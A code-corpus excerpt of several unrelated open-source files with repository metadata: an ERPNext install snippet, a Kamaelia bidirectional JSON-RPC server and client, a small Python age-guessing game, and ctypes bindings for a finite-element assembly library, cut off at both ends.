for fieldname, value in default_values:
b.set(fieldname, value)
b.save()
except frappe.MandatoryError:
pass
frappe.db.set_default("date_format", "dd-mm-yyyy")
def create_compact_item_print_custom_field():
from frappe.custom.doctype.custom_field.custom_field import create_custom_field
create_custom_field('Print Settings', {
'label': _('Compact Item Print'),
'fieldname': 'compact_item_print',
'fieldtype': 'Check',
'default': 1,
'insert_after': 'with_letterhead'
})
|
anandpdoshi/erpnext
|
erpnext/setup/install.py
|
Python
|
agpl-3.0
| 1,780
| 0.024719
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
'''
Bi-directional JsonRPC Server and Client for Kamaelia.
Copyright (c) 2009 Rasjid Wilcox and CDG Computer Services.
Licensed to the BBC under a Contributor Agreement
'''
import Axon
from Axon.Handle import Handle
from Axon.background import background
from Axon.Ipc import shutdownMicroprocess, producerFinished
from Kamaelia.Chassis.ConnectedServer import ServerCore
from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.Chassis.Graphline import Graphline
from Kamaelia.Internet.TCPClient import TCPClient
from jsonrpc import JsonRpc20, RPCFault, METHOD_NOT_FOUND, INTERNAL_ERROR, ERROR_MESSAGE, REQUEST, RESPONSE, ERROR, json_split
from traceback import format_exc
from collections import defaultdict
import types, inspect, Queue
# FIXME: add protection from Denial of Service
# decorators to mark function args as either
# callback requests or callback notifications
def cb_request(arg_name, response_func, convert_args = False):
def cb_request_dec(func):
if not hasattr(func, '_callbacks_'):
func._callbacks_ = {}
if response_func:
func._callbacks_[arg_name] = ResponseCallback(response_func, convert_args)
else:
func._callbacks_[arg_name] = None
return func
return cb_request_dec
def cb_notification(arg_name):
return cb_request(arg_name, None)
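# NOTE (editor): illustrative sketch, not part of the original module.
# A server-side procedure can mark an argument as a client callback; the
# argument arrives as a method name and is replaced by a CallbackProxy
# before dispatch (names below are made up):
#
#   def _on_ack(result):
#       print 'client acknowledged: %r' % (result,)
#
#   @cb_request('progress_cb', _on_ack)
#   def long_task(data, progress_cb):
#       progress_cb(['half way done'])   # request; _on_ack handles the reply
#       return 'finished'
#
#   @cb_notification('log_cb')
#   def quick_task(data, log_cb):
#       log_cb(['started'])              # fire-and-forget notification
#       return 'ok'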
class ResponseCallback(object):
def __init__(self, callback_func, convert_args = False):
'''if convert_args then convert a list, tuple or dict to args in standard jsonrpc way'''
self.callback_func = callback_func
self.convert_args = convert_args
class RequestOrNotification(object):
'If response_callback is None, then this is a notification'
def __init__(self, method, params = None, response_callback = None):
if response_callback: assert isinstance(response_callback, ResponseCallback)
self.method = method
self.params = params
self.response_callback = response_callback
class JsonRpcProtocol(object):
'Protocol Factory for JsonRpc over TCP'
def __init__(self, task_runner, id_prefix = 'server', debug = 0):
self.task_runner = task_runner
self.id_prefix = id_prefix
self.debug = debug
self.dispatch_table = {}
self.callback_table = defaultdict(dict) # try key on actual function
self.requests_on_connect = []
self.requests_on_connect_wait = None # id of request to wait for before sending next
self.requests_sent = {}
self._request_id_num = 1
self.connections = []
def get_request_id(self, request):
req_num = self._request_id_num
if self.id_prefix:
request_id = '%s-%s' % (self.id_prefix, req_num)
else:
request_id = req_num
assert isinstance(request, RequestOrNotification)
self.requests_sent[request_id] = request.response_callback
if request.response_callback:
self.add_callbacks(request.response_callback)
self._request_id_num += 1
return request_id
def add_callbacks(self, function):
if function in self.callback_table:
# already in callback table, so just return
return
if hasattr(function, '_callbacks_'): # 'response_callback'):
for arg_name, response_callback in function._callbacks_.items():
name = function.__name__
self.callback_table[function][arg_name] = response_callback
print 'Added callback for method %s, argument %s' % (name, arg_name)
try:
# args by position - offset needed for instance methods etc
offset = 1 if (hasattr(function, 'im_self') and function.im_self) else 0
arg_num = inspect.getargspec(function)[0].index(arg_name) - offset
self.callback_table[function][arg_num] = response_callback
print 'Added callback for method %s, arg_num %s' % (name, arg_num)
except ValueError:
print 'WARNING: unable to determine argument position for callback on method %s, argument %s.\n' \
'Automatic callback conversion will not occur if called by position.' % (name, arg_name)
def add_function(self, function, name = None):
if name is None:
name = function.__name__
if name in self.dispatch_table:
raise ValueError('rpc method %s already exists!' % name)
self.dispatch_table[name] = function
print 'Added rpc method %s' % name
self.add_callbacks(function)
def add_instance(self, instance, prefix = None):
'''Add all callable attributes of an instance not starting with '_'.
If prefix is none, then the rpc name is just <method_name>,
otherwise it is '<prefix>.<method_name>'
'''
for name in dir(instance):
if name[0] != '_':
func = getattr(instance, name, None)
if type(func) == types.MethodType:
if prefix:
rpcname = '%s.%s' % (prefix, func.__name__)
else:
rpcname = func.__name__
self.add_function(func, name = rpcname)
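# NOTE (editor): illustrative sketch, not part of the original module.
# Registering procedures with the factory might look like this (names are
# made up):
#
#   factory = JsonRpcProtocol(task_runner)
#   factory.add_function(long_task)                      # exposed as 'long_task'
#
#   class Calculator(object):
#       def add(self, a, b):
#           return a + b
#
#   factory.add_instance(Calculator(), prefix='calc')    # exposed as 'calc.add'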
def add_request_on_connect(self, req_or_notification, wait = True):
self.requests_on_connect.append( (req_or_notification, wait) )
def __call__(self, **kwargs):
if self.debug >= 1:
print 'Creating new Protocol Factory: ', str(kwargs)
connection = Graphline( SPLITTER = JsonSplitter(debug = self.debug, factory = self, **kwargs),
DESERIALIZER = Deserializer(debug = self.debug, factory = self, **kwargs),
DISPATCHER = Dispatcher(debug = self.debug, factory = self, **kwargs),
RESPONSESERIALIZER = ResponseSerializer(debug = self.debug, factory = self, **kwargs),
REQUESTSERIALIZER = RequestSerializer(debug = self.debug, factory = self, **kwargs),
FINALIZER = Finalizer(debug = self.debug, factory = self, **kwargs),
TASKRUNNER = self.task_runner,
linkages = { ('self', 'inbox') : ('SPLITTER', 'inbox'),
('self', 'request') : ('REQUESTSERIALIZER', 'request'),
('SPLITTER', 'outbox') : ('DESERIALIZER', 'inbox'),
('DESERIALIZER', 'outbox'): ('DISPATCHER', 'inbox'),
('DESERIALIZER', 'error'): ('RESPONSESERIALIZER', 'inbox'),
('DISPATCHER', 'outbox') : ('TASKRUNNER', 'inbox'),
('DISPATCHER', 'result_out') : ('RESPONSESERIALIZER', 'inbox'),
('DISPATCHER', 'request_out') : ('REQUESTSERIALIZER', 'request'),
('RESPONSESERIALIZER', 'outbox') : ('self', 'outbox'),
('REQUESTSERIALIZER', 'outbox'): ('self', 'outbox'),
('self', 'control') : ('SPLITTER', 'control'),
('SPLITTER', 'signal') : ('DESERIALIZER', 'control'),
('DESERIALIZER', 'signal'): ('DISPATCHER', 'control'),
('DISPATCHER', 'signal') : ('RESPONSESERIALIZER', 'control'),
('RESPONSESERIALIZER', 'signal') : ('REQUESTSERIALIZER', 'control'),
('REQUESTSERIALIZER', 'signal') : ('FINALIZER', 'control'),
('FINALIZER', 'signal') : ('self', 'signal'),
('DISPATCHER', 'wake_requester') : ('REQUESTSERIALIZER', 'control'),
} )
self.connections.append(connection)
return connection
class JsonSplitter(Axon.Component.component):
Inboxes = { 'inbox': 'accepts arbitrary (sequential) pieces of json stings',
'control': 'incoming shutdown requests' }
Outboxes = { 'outbox': 'a single complete json string',
'signal': 'outgoing shutdown requests' }
def __init__(self, **kwargs):
super(JsonSplitter, self).__init__(**kwargs)
self.partial_data = ''
if self.debug >= 3: print 'Created %s' % repr(self)
def main(self):
while not self.shutdown():
if self.dataReady('inbox'):
data = self.recv('inbox')
if self.debug >= 4: print 'Got data: <<%s>>' % data
Json_strings, self.partial_data = json_split(self.partial_data + data)
yield 1
# send to dispatch
for message in Json_strings:
if self.debug >= 3: print 'Sent to deserializer: %s' % message
self.send(message, 'outbox')
yield 1
if not self.anyReady():
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
self.send(msg, 'signal')
return True
return False
class Deserializer(Axon.Component.component):
Inboxes = {'inbox': 'complete json strings',
'control': 'shutdown messages',
}
Outboxes = {'outbox': 'the deserialized request/notification or result',
'error': 'the exception if there was an error deserializing',
'signal': 'shutdown messages',
}
def __init__(self, **kwargs):
super(Deserializer, self).__init__(**kwargs)
self.serializer = JsonRpc20() # FIXME: make this a parameter
if self.debug >= 3: print 'Created %s' % repr(self)
def main(self):
while not self.shutdown():
if self.dataReady('inbox'):
data = self.recv('inbox')
if self.debug >=1: print '--> %s' % data
try:
request = self.serializer.loads_request_response(data)
self.send(request, 'outbox')
except RPCFault, error:
self.send( (error, None), 'error')
if not self.anyReady():
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
self.send(msg, 'signal')
return True
return False
class CallbackProxy(object):
def __init__(self, method_name, response_callback):
self.method_name = method_name
self.response_callback = response_callback
self.params = None
self.component = None
self.outbox_name = None
def set_outbox(self, component, outbox_name):
self.component = component
self.outbox_name = outbox_name
def __call__(self, params = None):
if not self.component or not self.outbox_name:
raise ValueError('component or outbox_name not set')
req = RequestOrNotification(self.method_name, params, self.response_callback)
self.component.send(req, self.outbox_name)
class Dispatcher(Axon.Component.component):
Inboxes = {'inbox': 'rpc request/notification or response objects',
'result_in': 'the function/method result or RequestOrNotification',
'control': 'shutdown messages',
}
Outboxes = {'outbox': '(return_component, method, args, id) tuple for the worker. NOTE: return_component == (self, <boxname>)',
'result_out': 'the result of the request (relayed from result_in)',
'request_out': 'requests from callback functions',
'signal': 'shutdown messages',
'wake_requester': 'wake up RequestSerializer',
}
def __init__(self, **kwargs):
super(Dispatcher, self).__init__(**kwargs)
if self.debug >= 3: print 'Created %s' % repr(self)
def _do_dispatch(self, dispatch_func, args, id, notification, convert_args = True):
'Assumes args is always a list, tuple or dict'
kwargs = {}
if convert_args:
if isinstance(args, dict):
# args by name
args, kwargs = [], args
# find any callback args and replace with callback proxy
for arg_name in set(self.factory.callback_table[dispatch_func].keys()).intersection(set(kwargs.keys())):
kwargs[arg_name] = CallbackProxy(kwargs[arg_name], self.factory.callback_table[dispatch_func][arg_name])
else:
arg_nums = range(len(args))
for arg_num in set(self.factory.callback_table[dispatch_func].keys()).intersection(set(arg_nums)):
args[arg_num] = CallbackProxy(args[arg_num], self.factory.callback_table[dispatch_func][arg_num])
else:
args = [args]
return_box = (self, 'result_in')
dispatch_info = (dispatch_func, args, kwargs)
return_info = (id, notification)
if self.debug >= 3: print 'Sending: %r\n%r\n%r' % (return_box, dispatch_info, return_info)
self.send( (return_box, dispatch_info, return_info), 'outbox')
def _process_request(self, request):
if self.debug >= 3: print 'Got dispatch request: %s' % repr(request)
notification = False
if len(request) == 2:
notification = True
method, args = request
id = None
else:
method, args, id = request
if not notification and method not in self.factory.dispatch_table:
response = ( RPCFault(METHOD_NOT_FOUND, ERROR_MESSAGE[METHOD_NOT_FOUND]), id)
self.send(response, 'result_out')
else:
dispatch_func = self.factory.dispatch_table[method]
self._do_dispatch(dispatch_func, args, id, notification)
def _process_response(self, response):
print '=== Response: %s ===' % repr(response)
result, id = response
response_callback = None
if id == self.factory.requests_on_connect_wait:
self.factory.requests_on_connect_wait = None # clear waiting on this request
if len(self.factory.requests_on_connect):
self.send(Axon.Ipc.notify(self, id), 'wake_requester') # wake requester so it can send pending requests
# look up response callback
try:
response_callback = self.factory.requests_sent.pop(id)
assert isinstance(response_callback, ResponseCallback)
except KeyError:
print 'ERROR: Invalid response id %s' % id
if result is None:
return
if response_callback.convert_args and type(result) not in (types.ListType, types.TupleType, types.DictionaryType):
print "ERROR: Can't convert response result to procedure argments - must be List, Tuple or Dict"
return
if not response_callback:
print 'ERROR: Got result for a notification or request with no callback defined'
else:
self._do_dispatch(response_callback.callback_func, result, id, True, convert_args = response_callback.convert_args) # not really a notification - but we don't return a response to a response
def main(self):
while not self.shutdown():
if self.dataReady('inbox'):
data = self.recv('inbox')
if data[0] == REQUEST:
request = data[1]
self._process_request(request)
elif data[0] == RESPONSE:
# got a response to a request we sent
response = data[1]
self._process_response(response)
elif data[0] == ERROR:
# FIXME: handle error responses
print '!!! GOT ERROR RESPONSE: %s' % repr(data[1])
else:
# FIXME
print 'INTERNAL ERROR: Unexpected message type'
if self.dataReady('result_in'):
data = self.recv('result_in')
result, (id, notification) = data
if isinstance(result, RequestOrNotification):
if self.debug >= 3: print 'Got RequestOrNotification: %s' % result
self.send(result, 'request_out')
else:
if self.debug >= 2: print 'Got result for id %s:\n %s' % (id, repr(result))
if not notification:
self.send((result, id), 'result_out')
if not self.anyReady():
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
self.send(msg, 'signal')
return True
return False
class ResponseSerializer(Axon.Component.component):
Inboxes = {'inbox': '(result, id) tuple',
'control': 'shutdown messages',
}
Outboxes = {'outbox': 'the json-rpc response',
'signal': 'shutdown messages',
}
def __init__(self, **kwargs):
super(ResponseSerializer, self).__init__(**kwargs)
self.serializer = JsonRpc20() # FIXME: make this a parameter
if self.debug >= 3: print 'Created %s' % repr(self)
def main(self):
while not self.shutdown():
if self.dataReady('inbox'):
result, id = self.recv('inbox')
if self.debug >= 3: print 'Got result. Id: %r, Value: %r' % (id, result)
if isinstance(result, RPCFault):
response = self.serializer.dumps_error( result, id)
elif isinstance(result, Exception):
# procedure exception - FIXME: log to logger!
print format_exc()
response = self.serializer.dumps_error( RPCFault(INTERNAL_ERROR, ERROR_MESSAGE[INTERNAL_ERROR]), id )
else:
try:
response = self.serializer.dumps_response(result, id)
except RPCFault, e:
response = self.serializer.dumps_error( e, id)
# serialization error - log to logger!
print format_exc()
response = self.serializer.dumps_error( RPCFault(INTERNAL_ERROR, ERROR_MESSAGE[INTERNAL_ERROR]), id )
response += '\r\n' # make things easier to read if testing with telnet or netcat
if self.debug >= 1:
print '<-- %s' % response
self.send(response, 'outbox')
if not self.anyReady():
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
self.send(msg, 'signal')
return True
return False
class RequestSerializer(Axon.Component.component):
Inboxes = {'inbox': 'not used',
'request' : 'incoming RequestOrNotification objects',
'control': 'wakeup & shutdown messages',
}
Outboxes = {'outbox': 'the json-rpc request / notification',
'signal': 'shutdown messages',
}
def __init__(self, **kwargs):
super(RequestSerializer, self).__init__(**kwargs)
self.serializer = JsonRpc20() # FIXME: make this a parameter
if self.debug >= 3: print 'Created %s' % repr(self)
def _send_req_or_notification(self, req, wait = False):
assert isinstance(req, RequestOrNotification)
if req.response_callback:
id = self.factory.get_request_id(req) # this adds the id to self.requests_sent
if wait:
self.factory.requests_on_connect_wait = id
output = self.serializer.dumps_request(req.method, req.params, id) if req.params \
else self.serializer.dumps_request(req.method, id = id)
else:
output = self.serializer.dumps_notification(req.method, req.params) if req.params \
else self.serializer.dumps_notification(req.method)
output += '\r\n' # make things easier to read if testing with telnet or netcat
if self.debug >= 1: print '<-- %s' % output
self.send(output, 'outbox')
def main(self):
while not self.shutdown():
if len(self.factory.requests_on_connect) and not self.factory.requests_on_connect_wait:
request, wait = self.factory.requests_on_connect.pop(0)
self._send_req_or_notification(request, wait)
if self.dataReady('request'):
req = self.recv('request')
self._send_req_or_notification(req)
if not self.anyReady() and (len(self.factory.requests_on_connect) == 0 or self.factory.requests_on_connect_wait) :
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
self.send(msg, 'signal')
return True
return False
class Finalizer(Axon.Component.component):
Inboxes = {'inbox': 'not used',
'control': 'shutdown messages',
}
Outboxes = {'outbox': 'not used',
'signal': 'shutdown messages',
}
def __init__(self, **kwargs):
super(Finalizer, self).__init__(**kwargs)
if self.debug >= 3: print 'Created %s' % repr(self)
def main(self):
while not self.shutdown():
if not self.anyReady():
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
# FIXME: Log any outstanding request reponses missing
print 'Connection is being closed'
for req_id in self.factory.requests_sent:
print 'WARNING: No response seen to request %s' % req_id
self.send(msg, 'signal')
return True
return False
# -------------------------------------------
def ThreadedTaskRunner(num_workers = 5, debug = 0):
worker_list = []
for dummy in range(num_workers):
worker = ThreadedWorker(debug = debug)
worker.activate()
worker_list.append(worker)
manager = TaskManager(worker_list, debug = debug)
return manager
class ThreadedWorker(Axon.ThreadedComponent.threadedcomponent):
Inboxes = {'inbox': '(function, args, kwargs) tuple',
'control': 'shutdown messages',
}
Outboxes = {'outbox': 'the result or exception or callback request',
'signal': 'shutdown messages',
}
def __init__(self, **kwargs):
super(ThreadedWorker, self).__init__(**kwargs)
if self.debug >= 3: print 'Created %s' % repr(self)
def main(self):
while not self.shutdown():
if self.dataReady('inbox'):
func, args, kwargs = self.recv('inbox')
for arg in args:
if isinstance(arg, CallbackProxy):
arg.set_outbox(self, 'outbox')
for arg_name in kwargs:
if isinstance(kwargs[arg_name], CallbackProxy):
kwargs[arg_name].set_outbox(self, 'outbox')
if self.debug >= 3: print 'Worker %s got data: %r, %r, %r' % (id(self), func, args, kwargs)
try:
result = func(*args, **kwargs)
except Exception, error:
result = error
if self.debug >= 3: print 'Worker %s got result: %r' % (id(self), result)
self.send(result, 'outbox')
if not self.anyReady():
self.pause()
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
self.send(msg, 'signal')
return True
return False
class TaskManager(Axon.AdaptiveCommsComponent.AdaptiveCommsComponent):
Inboxes = {'inbox': '(return_box, dispatch_info, return_info) tuple',
'control': 'shutdown messages',
}
Outboxes = {'outbox': 'not used',
'signal': 'shutdown messages',
}
'''
return_box = (<sending_component>, <return_box_name>)
dispatch_info = (self.factory.dispatch_table[method], args, kwargs)
return_info = (id, notification)
'''
def __init__(self, workers, debug = 0):
super(TaskManager, self).__init__()
self.debug = debug
self.workers = workers # a list of worker components
self.task_data = [ None for x in range(len(workers)) ] # an available worker has None here
self.work_queue = []
self.worker_box_names = []
self.links = []
# make connections to the workers
for worker_num in range(len(self.workers)):
outbox_name = self.addOutbox('to_worker_%s' % worker_num)
inbox_name = self.addInbox('from_worker_%s' % worker_num)
signal_name = self.addOutbox('signal_worker_%s' % worker_num)
boxnames = {'to': outbox_name, 'from': inbox_name, 'signal': signal_name}
self.worker_box_names.append(boxnames)
outlink = self.link((self, outbox_name), (self.workers[worker_num], 'inbox'))
control_link = self.link((self, signal_name), (self.workers[worker_num], 'control'))
inlink = self.link((self.workers[worker_num], 'outbox'), (self, inbox_name))
self.links.append((outlink, control_link, inlink))
if self.debug >= 3: print 'Created %s' % repr(self)
def main(self):
while not self.shutdown():
if self.dataReady('inbox'):
data = self.recv('inbox')
if self.debug >= 3: print 'Task Manager got data: %s' % repr(data)
self.work_queue.append(data)
if len(self.work_queue) != 0 and None in self.task_data:
return_box, dispatch_info, return_info = self.work_queue.pop(0)
result_box_name = self.addOutbox('%s-%s-%s' % (id(return_box), id(dispatch_info), id(return_info)))
self.link((self, result_box_name), return_box)
worker_num = self.task_data.index(None) # pick the first free worker
self.task_data[worker_num] = (result_box_name, return_box, return_info)
if self.debug >= 3:
print 'Sending task data to worker %s (box %s)' % (worker_num, self.worker_box_names[worker_num]['to'])
print 'Dispatch:', dispatch_info
self.send(dispatch_info, self.worker_box_names[worker_num]['to'])
if self.anyReady():
for worker_num in range(len(self.workers)):
boxname = self.worker_box_names[worker_num]['from']
if self.dataReady(boxname):
data = self.recv(boxname)
if self.debug >= 3: print 'TaskManager got data %r on boxname %s' % (data, boxname)
result_box_name, return_box, return_info = self.task_data[worker_num]
self.send( (data, return_info), result_box_name) # post the result
if not isinstance(data, RequestOrNotification):
if self.debug >= 3: print '** Doing unlink ** on %s' % result_box_name
self.unlink( (self, result_box_name), return_box)
self.deleteOutbox(result_box_name)
self.task_data[worker_num] = None # mark that worker as done
yield 1
if not self.anyReady():
self.pause()
yield 1
if self.debug >= 3:
print 'End of main for %s' % self.__class__.__name__
def shutdown(self):
if self.dataReady('control'):
msg = self.recv('control')
if isinstance(msg, shutdownMicroprocess) or isinstance(msg, producerFinished):
if self.debug >= 3: print '%s got shutdown msg: %r' % (self.__class__.__name__, msg)
for boxnames in self.worker_box_names:
self.send(msg, boxnames['signal'])
self.send(msg, 'signal')
return True
return False
class JsonRPCBase(object):
'Base class for JsonRPC clients and servers'
def __init__(self, workers, debug):
self.workers = workers
self.debug = debug
taskrunner = ThreadedTaskRunner(num_workers = self.workers, debug = self.debug)
self.jsonprotocol = JsonRpcProtocol(taskrunner, debug = self.debug)
def add_function(self, func):
self.jsonprotocol.add_function(func)
def add_instance(self, instance):
self.jsonprotocol.add_instance(instance)
def add_request_on_connect(self, req_or_notification, wait = True):
self.jsonprotocol.add_request_on_connect(req_or_notification, wait)
class JsonRpcTCPServer(JsonRPCBase):
def __init__(self, portnumber, workers = 5, debug = 1):
JsonRPCBase.__init__(self, workers = workers, debug = debug)
self.portnumber = portnumber
self.server = None
def start(self):
if self.debug: print 'Starting JSON-RPC server on port %s' % self.portnumber
self.server = ServerCore( protocol = self.jsonprotocol, port = self.portnumber )
self.server.run()
#FIXME: some way to stop!
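# NOTE (editor): illustrative sketch, not part of the original module.
# A minimal server built on the class above might look like this (port
# number is made up):
#
#   def echo(text):
#       return text
#
#   server = JsonRpcTCPServer(portnumber=8765, workers=2, debug=0)
#   server.add_function(echo)
#   server.start()    # blocks, serving JSON-RPC 2.0 requests over TCP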
class JsonRpcTCPClient(JsonRPCBase):
def __init__(self, host, portnumber, delay = 0, workers = 5, debug = 1):
JsonRPCBase.__init__(self, workers = workers, debug = debug)
self.host = host
self.portnumber = portnumber
self.delay = delay
self.client = Graphline(
TCPCLIENT = TCPClient(self.host, self.portnumber, self.delay),
PROTOCOL = self.jsonprotocol(),
linkages = { ('TCPCLIENT', 'outbox') : ('PROTOCOL', 'inbox'),
('PROTOCOL', 'outbox') : ('TCPCLIENT', 'inbox'),
('TCPCLIENT', 'signal') : ('PROTOCOL', 'control'),
('PROTOCOL', 'signal') : ('TCPCLIENT', 'control'),
} )
self.handle = Handle(self.client)
def start(self):
if self.debug: print 'Starting TCP Client - connecting to %s on port %s' % (self.host, self.portnumber)
##self.client.run()
try:
background().start()
except:
pass # assume already running
self.client.activate()
class Proxy(object):
def __init__(self, host, portnumber, delay = 0, threaded = True, workers = 5, debug = 1):
self.host = host
self.portnumber = portnumber
self.delay = delay
self.threaded = threaded
self.workers = workers
self.debug = debug
self.client = JsonRpcTCPClient(host = host, portnumber = portnumber, delay = delay, workers = workers,
debug = debug)
self.request = RequestProxy(self.client, True)
self.notification = RequestProxy(self.client, False)
class RequestProxy(object):
def __init__(self, client, request = True):
self.client = client
self.request = request
def _remote_call(self, name, params):
client = self.client
|
sparkslabs/kamaelia_
|
Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Apps/JsonRPC/BDJsonRPC.py
|
Python
|
apache-2.0
| 35,300
| 0.013059
|
'''
Notes
for i in range(10):
# ask once every three tries
'''
age=22
c=0
while True:
if c<3:
cai=input("Please enter your guess for the age:")
if cai.isdigit(): # check whether the input is an integer
print("Valid format")
cai1=int(cai) # input is an integer, convert it to int
if cai1==age and c<3:
print("You guessed it")
break
elif cai1>age and c<3:
print("Too high")
c+=1
elif cai1<age and c<3:
print("Too low")
c+=1
else: # input is not an integer
print("Invalid input format")
else:
p=input("Out of tries. Continue? Type yes to keep playing or no to quit:")
if p=="yes":
c=0
cai=input("Please enter your guess for the age:")
if cai.isdigit(): # check whether the input is an integer
print("Valid format 2")
cai1=int(cai) # input is an integer, convert it to int
if cai1==age and c<3:
print("You guessed it")
break
elif cai1>age and c<3:
print("Too high")
c+=1
elif cai1<age and c<3:
print("Too low")
c+=1
else: # input is not an integer
print("Invalid input format")
elif p=="no":
print("You chose to quit, bye bye")
break
|
xiaoyongaa/ALL
|
python基础2周/17猜年龄游戏.py
|
Python
|
apache-2.0
| 1,545
| 0.027353
|
import numpy as np
from ctypes import (
CDLL,
POINTER,
ARRAY,
c_void_p,
c_int,
byref,
c_double,
c_char,
c_char_p,
create_string_buffer,
)
from numpy.ctypeslib import ndpointer
import sys, os
prefix = {"win32": "lib"}.get(sys.platform, "lib")
extension = {"darwin": ".dylib", "win32": ".dll"}.get(sys.platform, ".so")
dir_lib = {"win32": "bin"}.get(sys.platform, "lib")
libcore = CDLL(os.path.join("build", dir_lib, prefix + "core" + extension))
def set_assembleElementalMatrix2D_c_args(N):
"""
    Assign function and set the input argument types for a 2D elemental matrix
    (int, int, int, double(N,2), double(N,N))
"""
f = libcore.assembleElementalMatrix2D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(N, 2), dtype="double", flags="F"),
ndpointer(shape=(N, N), dtype="double", flags="F"),
]
f.restype = None
return f
def set_create_simple_array_c_args(N):
"""
    Assign function and set the argument types of a simple array
"""
f = libcore.create_simple_array_c
f.argtypes = [ndpointer(shape=(N, N), dtype="double", flags="F")]
f.restype = None
return f
def set_assembleElementalMatrix1D_args(N):
"""
    Assign function and set the input argument types for a 1D elemental matrix
(int, int, int, c_double(N), c_double(N,N))
"""
f = libcore.assembleElementalMatrix1D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(N,), dtype="double", flags="F"),
ndpointer(shape=(N, N), dtype="double", flags="F"),
]
f.restype = None
return f
def set_assemble1D_c_args(num_cells, num_pts_per_cell, num_pts):
"""
    Assign function and set the input argument types for assembling a full 1D
matrix
(int, int, int, c_double(N), c_double(N1,N2), c_double, c_double, c_double(N,N))
"""
f = libcore.assemble1D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(num_pts,), dtype="double", flags="F"),
ndpointer(shape=(num_cells, num_pts_per_cell), dtype="int32", flags="F"),
c_double,
c_double,
ndpointer(shape=(num_pts, num_pts), dtype="double", flags="F"),
]
f.restype = None
return f
def set_assemble2D_c_args(num_cells, num_pts_per_cell, num_pts):
"""
    Assign function and set the input argument types for assembling a full 2D
    matrix
    (int, int, int, double(N,2), int(N1,N2), double, double(2), double(N,N))
"""
f = libcore.assemble2D_c
f.argtypes = [
c_int,
c_int,
c_int,
ndpointer(shape=(num_pts, 2), dtype="double", flags="F"),
ndpointer(shape=(num_cells, num_pts_per_cell), dtype="int32", flags="F"),
c_double,
ndpointer(shape=(2,), dtype="double", flags="F"),
ndpointer(shape=(num_pts, num_pts), dtype="double", flags="F"),
]
f.restype = None
return f
def set_pascal_single_row_args(N):
"""
    Assign the argument types for a single row of Pascal's triangle
"""
f = libcore.pascal_single_row_c
f.argtypes = [
c_int,
c_double,
c_double,
ndpointer(shape=(N + 1,), dtype="double", flags="F"),
]
f.restype = None
return f
def set_pascal_2D_quad_c_args(N):
"""
    Assign the argument types for the full (quadrilateral) Pascal rows
"""
f = libcore.pascal_2D_quad_c
f.argtypes = [
c_int,
c_double,
c_double,
ndpointer(shape=((N + 1) ** 2,), dtype="double", flags="F"),
]
f.restype = None
return f
def pascal_2D_single_row(N, x, y):
xs = np.array([np.power(x, N - ii) for ii in range(N + 1)])
ys = np.array([np.power(y, ii) for ii in range(N + 1)])
return xs * ys
def pascal_2D_post_row(N, ii, x, y):
temp = pascal_2D_single_row(ii, x, y)
return temp[ii - N : N + 1]
def pascal_2D_total_row(N, x, y):
temp_pre = [pascal_2D_single_row(ii, x, y) for ii in range(N + 1)]
temp_post = [pascal_2D_post_row(N, ii, x, y) for ii in range(N + 1, 2 * N + 1)]
row = temp_pre + temp_post
return np.concatenate(row)
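# Illustrative usage sketch (not part of the original file): it assumes the
# compiled "core" shared library is present where the CDLL call above expects
# it, and uses placeholder sizes/values.
if __name__ == "__main__":
    N = 4
    # Fortran-ordered buffer that the C routine fills in place
    Ie = np.zeros((N, N), dtype="double", order="F")
    fill = set_create_simple_array_c_args(N)
    fill(Ie)
    print(Ie)

    # Pure-Python helper: full row of the 2D (quadrilateral) Pascal triangle,
    # i.e. the monomials 1, x, y, x*y evaluated at (2, 3)
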